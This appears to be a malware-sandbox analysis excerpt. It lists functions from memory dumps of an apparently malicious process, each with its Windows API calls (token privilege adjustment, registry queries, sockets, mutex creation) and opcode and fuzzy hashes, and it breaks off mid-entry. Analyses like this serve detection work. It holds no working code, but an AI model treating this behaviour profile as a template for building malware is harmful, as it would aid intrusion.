X1ar, xrefs: 0ADB5778
X1ar, xrefs: 0ADB5548
X1ar, xrefs: 0ADB4FAE
X1ar, xrefs: 0ADB582A
X1ar, xrefs: 0ADB56DF
X1ar, xrefs: 0ADB57A7
X1ar, xrefs: 0ADB5052
X1ar, xrefs: 0ADB54F2
X1ar, xrefs: 0ADB556E
X1ar, xrefs: 0ADB5511
X1ar, xrefs: 0ADB5709
X1ar, xrefs: 0ADB4FE6

Memory Dump Source

Source File: 00000003.00000002.493396188.000000000ADB0000.00000040.00000001.sdmp, Offset: 0ADB0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: X1ar$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar$X1ar
API String ID: 2994545307-51262497
Opcode ID: c018f40a5aca4e8f329e9d3dd8a2cd9ddf492807c0ad921506324b36a803e1b3
Instruction ID: c8f19fa4dbf4bca7d9724ddb7ad05a0ee83f270616f06a94d7bc0b912a2f8726
Opcode Fuzzy Hash: c018f40a5aca4e8f329e9d3dd8a2cd9ddf492807c0ad921506324b36a803e1b3
Instruction Fuzzy Hash: 49624C31E00219CFDB25DF68DD54BDEBBB2AF89300F1581A9D90AAB251DB71AD81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0558B078, Relevance: 1.7, APIs: 1, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0558B0DD

Memory Dump Source

Source File: 00000003.00000002.480771414.0000000005580000.00000040.00000001.sdmp, Offset: 05580000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f7bf40b969c94427d01add97ca7615b0d7f3edcb18998fb67966bd4699f679a2
Instruction ID: e99ddd738f6bdd446e0f6690b922a5d273afb9461647d85923bce08744c3d253
Opcode Fuzzy Hash: f7bf40b969c94427d01add97ca7615b0d7f3edcb18998fb67966bd4699f679a2
Instruction Fuzzy Hash: 47514470B002059BDB04EFB8D854AADBBBAFF88314F149529E506EB244EF30DC45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0168AF07, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0168AF87

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: bdb7fc8957ec78a5bb1938e683b1626238f814ccf4fe2941731859ccac4b15fd
Instruction ID: 2aa4e81042a7545b4f8c3ffd59b4f6cd60782b929b50a429abb37075f846a631
Opcode Fuzzy Hash: bdb7fc8957ec78a5bb1938e683b1626238f814ccf4fe2941731859ccac4b15fd
Instruction Fuzzy Hash: CD2191B5509784AFDB138F29DC40B52BFB4EF06210F08859AED858F2A3D3759908DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0168B089, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0168B0F5

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 3f9f3aaaed172c83a1f98beb26e109125f18de63ad39e5f0cc1c889819db60fa
Instruction ID: bfd49b82634ec804f27fd0560e9b8467f0333ab325d702b2784d3e596a443a88
Opcode Fuzzy Hash: 3f9f3aaaed172c83a1f98beb26e109125f18de63ad39e5f0cc1c889819db60fa
Instruction Fuzzy Hash: 99118E72409384AFDB238F24DC45A52FFB4EF06314F0980DAE9848F263D275A918DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0168AF3E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0168AF87

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 79ad13aa7a6387bff9fcad7d3a68c50aba366ff483446f12c3040f1acb0ac7b9
Instruction ID: 1d98ce256ec71a333fd86087772ca3dfa5764e779eb2ce5ec4264af02974ac69
Opcode Fuzzy Hash: 79ad13aa7a6387bff9fcad7d3a68c50aba366ff483446f12c3040f1acb0ac7b9
Instruction Fuzzy Hash: C5115E755006049FDB21DFA9DC84B66FFE4EF08220F08C56AEE498B652D375E418DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0168B0BA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0168B0F5

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 0e7094bd1edbe98a000163f446a43e1da8471cf121b967e0e34c8dcee708612f
Instruction ID: f7634d77d107fa82de1bd5bd00fce7fc33a2f1a456441227bf0b79fd3ac0e545
Opcode Fuzzy Hash: 0e7094bd1edbe98a000163f446a43e1da8471cf121b967e0e34c8dcee708612f
Instruction Fuzzy Hash: 2A0174319006449FDB219F59DC84B26FFA0EF08321F08C1AADE894B212D2B6A419DB62

Uniqueness

Uniqueness Score: -1.00%

Function 05584E00, Relevance: 8.2, APIs: 1, Strings: 3, Instructions: 1217libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05585168

Strings

:@:r, xrefs: 055866D2
:@:r, xrefs: 055851F9
:@:r, xrefs: 055862B9

Memory Dump Source

Source File: 00000003.00000002.480771414.0000000005580000.00000040.00000001.sdmp, Offset: 05580000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@:r$:@:r$:@:r
API String ID: 2994545307-2477124705
Opcode ID: 6de26e46c2460e1b2cd5d7c0b51a4fdef22f4faa67efa7e8303ba5f7cb45d2c8
Instruction ID: 6f5a9b7d6ec22fba1d60fe0d322138f2022e43bcdbdbf4a2d27ac1f3746eab7f
Opcode Fuzzy Hash: 6de26e46c2460e1b2cd5d7c0b51a4fdef22f4faa67efa7e8303ba5f7cb45d2c8
Instruction Fuzzy Hash: 55C2BC74A016288FCB64DF68DC54AAEBBB6BF88301F5094D6D909E7354EB319E81CF41

Uniqueness

Uniqueness Score: -1.00%

Function 05584E30, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 690libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05585168

Strings

:@:r, xrefs: 055851F9

Memory Dump Source

Source File: 00000003.00000002.480771414.0000000005580000.00000040.00000001.sdmp, Offset: 05580000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@:r
API String ID: 2994545307-1441432688
Opcode ID: b20307f1105ff61fe7c1977b6374a83c03d9a526617d0d584ad7f426e6083123
Instruction ID: 713b02ca291580170d758e2dab9937a893a3e81000c0cf48699d2d534eb7aaae
Opcode Fuzzy Hash: b20307f1105ff61fe7c1977b6374a83c03d9a526617d0d584ad7f426e6083123
Instruction Fuzzy Hash: BA729574E116288FCB60DF68DC84AAABBB6BF49311F5090E6D909E3351EB315E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 05584E84, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 680libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05585168

Strings

:@:r, xrefs: 055851F9

Memory Dump Source

Source File: 00000003.00000002.480771414.0000000005580000.00000040.00000001.sdmp, Offset: 05580000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@:r
API String ID: 2994545307-1441432688
Opcode ID: 0606c236da5c018239d46b3d042120d9df8e7042822f86960dd3773507a37dff
Instruction ID: 94e8b968e71299f21fbf927ccf7f07b8273b7cb03bccdb4736327f5082322dcb
Opcode Fuzzy Hash: 0606c236da5c018239d46b3d042120d9df8e7042822f86960dd3773507a37dff
Instruction Fuzzy Hash: 9C729574E116288FCB60DF68DC84AAABBB6BF49311F5090E6D909E3351EB315E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 05584ED8, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 670libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05585168

Strings

:@:r, xrefs: 055851F9

Memory Dump Source

Source File: 00000003.00000002.480771414.0000000005580000.00000040.00000001.sdmp, Offset: 05580000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@:r
API String ID: 2994545307-1441432688
Opcode ID: ef33bac997ef0557b133d18ada4d85ce940dee5e27809cdfa06a91e43b92d93d
Instruction ID: 469ffe758d1b04a2648fc3dfa23b75d0d949e6f02bae70242822ac5afdf67693
Opcode Fuzzy Hash: ef33bac997ef0557b133d18ada4d85ce940dee5e27809cdfa06a91e43b92d93d
Instruction Fuzzy Hash: D1729674E116288FCB60DF68DC84AAABBB6BF49311F5090E6D909E3351EB315E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 05584F2C, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 660libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05585168

Strings

:@:r, xrefs: 055851F9

Memory Dump Source

Source File: 00000003.00000002.480771414.0000000005580000.00000040.00000001.sdmp, Offset: 05580000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@:r
API String ID: 2994545307-1441432688
Opcode ID: 05dbf7e14ece9089e769012c4d7e211cd05ed60ae57d691a7a37e74bb6d24ecc
Instruction ID: 635f1dd38f3d9d1227881059a38593e3a53e03d34ea931f606ce03974526ce60
Opcode Fuzzy Hash: 05dbf7e14ece9089e769012c4d7e211cd05ed60ae57d691a7a37e74bb6d24ecc
Instruction Fuzzy Hash: 5C729674E116288FCB60DF68DC84AAABBB6BF49311F5090E6D909E3351EB315E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 05584F80, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 650libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05585168

Strings

:@:r, xrefs: 055851F9

Memory Dump Source

Source File: 00000003.00000002.480771414.0000000005580000.00000040.00000001.sdmp, Offset: 05580000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@:r
API String ID: 2994545307-1441432688
Opcode ID: dd489342a2095b1bbc342c967f450d68dded1333e7928cfecd73056ff5511060
Instruction ID: fdb1b5008d2241a6194ac89e4dcdb3a8beeb6c51fd05399cc86541871b596340
Opcode Fuzzy Hash: dd489342a2095b1bbc342c967f450d68dded1333e7928cfecd73056ff5511060
Instruction Fuzzy Hash: 83629674E116288FCB60DF68DC84AAABBB6BF49311F5090E6D909E3350EB315E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 05584FD4, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 640libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05585168

Strings

:@:r, xrefs: 055851F9

Memory Dump Source

Source File: 00000003.00000002.480771414.0000000005580000.00000040.00000001.sdmp, Offset: 05580000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@:r
API String ID: 2994545307-1441432688
Opcode ID: 2e386da765c0ba967843dbb23b43980daa6489fe96fda801813c5e2188cd3adf
Instruction ID: 4835a7a1e02a9c4bdfed4087cee5cb8e26e7b2df304d9450b75174b484f255d1
Opcode Fuzzy Hash: 2e386da765c0ba967843dbb23b43980daa6489fe96fda801813c5e2188cd3adf
Instruction Fuzzy Hash: 61629674E116288FCB60DF68DC84AAABBB6BF48311F5091E6D909E3354EB315E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 05585034, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 627libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05585168

Strings

:@:r, xrefs: 055851F9

Memory Dump Source

Source File: 00000003.00000002.480771414.0000000005580000.00000040.00000001.sdmp, Offset: 05580000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@:r
API String ID: 2994545307-1441432688
Opcode ID: 79a574f0a9f6289e5cc955da33390ca5e20bf958f50a6c472b45d68dd3b4a779
Instruction ID: ad82c54ad5fc8189382488dac69084bd322785c5b4b66552489311e8522351bf
Opcode Fuzzy Hash: 79a574f0a9f6289e5cc955da33390ca5e20bf958f50a6c472b45d68dd3b4a779
Instruction Fuzzy Hash: 9B629674E116288FCB60DF68DC84AAABBB6BF48311F5090E6D909E3355EB315E81CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0558ABF8, Relevance: 2.0, APIs: 1, Instructions: 471libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0558B0DD

Memory Dump Source

Source File: 00000003.00000002.480771414.0000000005580000.00000040.00000001.sdmp, Offset: 05580000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3e0426be3ac0313dc7a625712e7c4f300308a2df3904bf871a5d098f02a6c4b3
Instruction ID: 35a9ca1bf42a9644e0c7b5a18956fa3c40e5ea453f025d8b2928ab4187f0ae84
Opcode Fuzzy Hash: 3e0426be3ac0313dc7a625712e7c4f300308a2df3904bf871a5d098f02a6c4b3
Instruction Fuzzy Hash: 8C028930A01204DFCB24EFB8C548AAEBBF7FF88325B149569E516AB350DB31E945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0ADE9C78, Relevance: 1.8, APIs: 1, Instructions: 267libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0ADE9D58

Memory Dump Source

Source File: 00000003.00000002.493421592.000000000ADE0000.00000040.00000001.sdmp, Offset: 0ADE0000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c40042083a0b834e5bd69798e855953c3e0bd2898aee50bd37dbbf19899f6f0a
Instruction ID: 3364544c777c9bf11a7fe557aef6726505309488c6ba0c6c8183d28abee65074
Opcode Fuzzy Hash: c40042083a0b834e5bd69798e855953c3e0bd2898aee50bd37dbbf19899f6f0a
Instruction Fuzzy Hash: 96A1B130B012058FDB14EFB8C8646AEBBF2AF85315F16856AE405EB395DB74DC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05F94EB5, Relevance: 1.7, APIs: 1, Instructions: 153registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000E2C,?,?), ref: 05F9500E

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 82c93db2482cf105e34da6c4b101c9ba75ec522010d1369ed9393d87466f772d
Instruction ID: ccac0f290199fc021e8f0a5dd53a2394205902cfb0659d22917fd663d5bd065d
Opcode Fuzzy Hash: 82c93db2482cf105e34da6c4b101c9ba75ec522010d1369ed9393d87466f772d
Instruction Fuzzy Hash: 7451806654E3C06FD7038B358C65A52BF749F87614F1E80DBD9888F2A3D129A80AD773

Uniqueness

Uniqueness Score: -1.00%

Function 05F9389A, Relevance: 1.6, APIs: 1, Instructions: 110registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05F93951

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 1abbf967bc761f2873996165e5fe1ae220626a6f92bbb281046818f0e046cced
Instruction ID: 38591e0bd408456c2bcbd6db8f77c413f9fb2532194f54139cd98a27508ba6a7
Opcode Fuzzy Hash: 1abbf967bc761f2873996165e5fe1ae220626a6f92bbb281046818f0e046cced
Instruction Fuzzy Hash: 4D319571409784AFE7128F64CC44FA6BFB8EF46310F08889BE9859F193D264A809CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F92179, Relevance: 1.6, APIs: 1, Instructions: 109networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32 ref: 05F92242

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 71926425011705b16ff00f4378f786fab13084bf8a2e87242ea2b96d67c5085f
Instruction ID: b92849bdc3dd103bdb4dd4e7cc0d20a9d494831f8b9cddcf2181170f69c9d307
Opcode Fuzzy Hash: 71926425011705b16ff00f4378f786fab13084bf8a2e87242ea2b96d67c5085f
Instruction Fuzzy Hash: 23417C7540D7C0AFEB178B659C54B56BFB4EF07210F0985DBE9848F1A3C329A809CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05F91B96, Relevance: 1.6, APIs: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 05F91C55

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7c96dc01728432c49770ec8162aae9f032d4c0abdc44fc1039513cb61c8af7ea
Instruction ID: 40fde2c441f87322f7a7b4229adc73acbbf15450a65448217b41f0697cc10cd5
Opcode Fuzzy Hash: 7c96dc01728432c49770ec8162aae9f032d4c0abdc44fc1039513cb61c8af7ea
Instruction Fuzzy Hash: 17319571505780AFE722CF65DC45FA2BFE8EF46710F08849EE9858B252D335A805DB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F92DF7, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E2C), ref: 05F92ECF

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 6e3ffacdd97e88b42b4a5fa4d38a676ca8101405b84dab6d60275ec3cf4bdc0a
Instruction ID: a92f31db61efd205ac747558a84dc1c40908e6aebf2343fdbe2cc6ce5617e7fa
Opcode Fuzzy Hash: 6e3ffacdd97e88b42b4a5fa4d38a676ca8101405b84dab6d60275ec3cf4bdc0a
Instruction Fuzzy Hash: 3F31C3B2504340BFF7228B60DC44FA6BFACEF46710F14849AFA849B192D374A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F936B0, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F9376F

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: 54a1c3b8c0f7d4dc7b83fb6cd73670f4689388f012fb5ebc6d2232b618336475
Instruction ID: 784051af9f8a8a61ad08273067318f0de4fe20565bd7cec6e9d0371206e15ec5
Opcode Fuzzy Hash: 54a1c3b8c0f7d4dc7b83fb6cd73670f4689388f012fb5ebc6d2232b618336475
Instruction Fuzzy Hash: 93316E7140E7C05FE7138B258C64AA6BFB4EF07214F0984DBD9C49F1A3D2696809C772

Uniqueness

Uniqueness Score: -1.00%

Function 05F93263, Relevance: 1.6, APIs: 1, Instructions: 93encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000E2C,?,?), ref: 05F93326

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: 3da949094eae190fb9e613bc5372a738249e03c00ecaa6e88e6916b0ca02dcc7
Instruction ID: 7de3509e866b04d9d622fbaafc0bf0f06d7fcdfcc2ebe9afabcfbca0fab7833e
Opcode Fuzzy Hash: 3da949094eae190fb9e613bc5372a738249e03c00ecaa6e88e6916b0ca02dcc7
Instruction Fuzzy Hash: 4E31907650D3C45FD7038B258C61B62BFB4EF47614F1E84CBD8848F2A3E6246919C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 05F93165, Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F93219

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 1ede001383088395348c7be4ad788a8049bbf9807312b8bd185d4dc762b8625b
Instruction ID: 95c125c451cf6874def2260010cfcce7006caa6e0da6e2b39ce40970d13eb9ed
Opcode Fuzzy Hash: 1ede001383088395348c7be4ad788a8049bbf9807312b8bd185d4dc762b8625b
Instruction Fuzzy Hash: 5C318371505780AFEB228F21CC40F52FFB8EF46310F08889BE9858B162D335A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F93A9A, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05F93B46

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 8c087f7cc55d4035388fa4619709edc0895adcba995c2ab1953dbb4bf995508a
Instruction ID: f502d02f6e3e1211f4bf0bbf3efdb53a4a093e7a5d948d1c337c1e04da41fcc1
Opcode Fuzzy Hash: 8c087f7cc55d4035388fa4619709edc0895adcba995c2ab1953dbb4bf995508a
Instruction Fuzzy Hash: B33193B1509784AFEB228F24DC44F66BFA8EF46310F08849BED849B253D224A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 05F90F05, Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 05F90FAE

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 66f6a2ea74b952128864bcf361c19b229124770527baedd823ee31a99e424b8b
Instruction ID: ba76fe48cdbec40652af872212c5280c1fa7d8a37bd855723e23cf2c228e7ce1
Opcode Fuzzy Hash: 66f6a2ea74b952128864bcf361c19b229124770527baedd823ee31a99e424b8b
Instruction Fuzzy Hash: 47314C7550E7C09FDB138B21DC64A51BFB8AF07214B0E80DBD985CF1A3D6689948DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0168A8D9, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 0168A989

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 9ca4b36bd84336ae87c57a24c4ad2a0eca6a9887d93273521e10542d937dfef6
Instruction ID: a7cabec9b15c9d38c3ae0bfd6586584dcc29e7eeb74bbfee7a19dac8cff700df
Opcode Fuzzy Hash: 9ca4b36bd84336ae87c57a24c4ad2a0eca6a9887d93273521e10542d937dfef6
Instruction Fuzzy Hash: A9319172408344AFE7228B64CC84F67FFBCEF06310F08859BE9849B252D224A808CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F95123, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F951D8

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e59a58e5686e5ebffd64e8857879d064f4f77cec320d3ad427ee389ec67777f9
Instruction ID: d08019050c8ea8bbca0894c93002f80561c681215ba811b87582191c4c39be82
Opcode Fuzzy Hash: e59a58e5686e5ebffd64e8857879d064f4f77cec320d3ad427ee389ec67777f9
Instruction Fuzzy Hash: 3631A771509780AFEB22CF64CC44F63BFB8EF46310F08859BE9859B152D364A509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F92508, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E2C), ref: 05F9259F

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: c01e7b561742a4fa02a7b0665b397d1b7b8f82b40063301c8505fbec946aab61
Instruction ID: df57634b66959d92accecf7803dd4735dc6bcea1065818bb22741c4302dbfcd2
Opcode Fuzzy Hash: c01e7b561742a4fa02a7b0665b397d1b7b8f82b40063301c8505fbec946aab61
Instruction Fuzzy Hash: 43319372504345AFEB21CF65DC45F67BFACEF45310F0884AAE944DB152D764A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0168B464, Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 0168B4FE

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 1dd97e58ad14d1afbc7ddaa175703ed79d4f4f6593f45cb73ee830f7ae0bdf5e
Instruction ID: 8cee034c8f3be6ec4b1a8879fd2dc12167b15c240ee8f76aec5b253fc4a41cd3
Opcode Fuzzy Hash: 1dd97e58ad14d1afbc7ddaa175703ed79d4f4f6593f45cb73ee830f7ae0bdf5e
Instruction Fuzzy Hash: F931D5B25093806FEB128F24DC45F56BFB8EF46324F0885DBE984DB193C2249905C771

Uniqueness

Uniqueness Score: -1.00%

Function 0168A9D1, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 0168AA8C

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3c327dbb2e28256d5c65a9694e5ca3245fb14e8ab495f68246530e6d84f856bd
Instruction ID: 6e16c6db4b2d43674104eb45a63ebb798bfc5a6068396c5fcbdcea1c4a96fdb2
Opcode Fuzzy Hash: 3c327dbb2e28256d5c65a9694e5ca3245fb14e8ab495f68246530e6d84f856bd
Instruction Fuzzy Hash: 3731AF71109384AFE722CB65CC84F62FFA8EF06310F08859BED858B252D364E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F927A0, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 05F92852

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: ffd2ee6431fad715f93c4ebbd95c3f825ad29e1fd75093d929e08b553956fc75
Instruction ID: 30120d2df2522a68e28bfbcaa020dc37094096c4aa3187fb0269f0971d4fecdb
Opcode Fuzzy Hash: ffd2ee6431fad715f93c4ebbd95c3f825ad29e1fd75093d929e08b553956fc75
Instruction Fuzzy Hash: 0931D6B2404780AFE722CF55DC45F96FFF8EF06320F04459AE9849B252D375A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F9240A, Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F924B4

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: dfd0d8050d32489564494bef265997067c629a3d1279508a550b8961ddb9bf4b
Instruction ID: 5e12662d5655c7105a534369381dee36cee8d8d95a86a1ed076b877a01ee38ec
Opcode Fuzzy Hash: dfd0d8050d32489564494bef265997067c629a3d1279508a550b8961ddb9bf4b
Instruction Fuzzy Hash: 8B3184765097806FEB228B25DC40F92BFB8EF06310F0884DBE9859B153D264A509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F92A55, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 05F92AF5

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 097ba0d36844439edc896322db3dc467e530a8803bd2e9b705f2298ac483adbb
Instruction ID: 636d75ee6a444ef01e73ac1311a2a75fd009dcbd7d3995fff508c42809ddd649
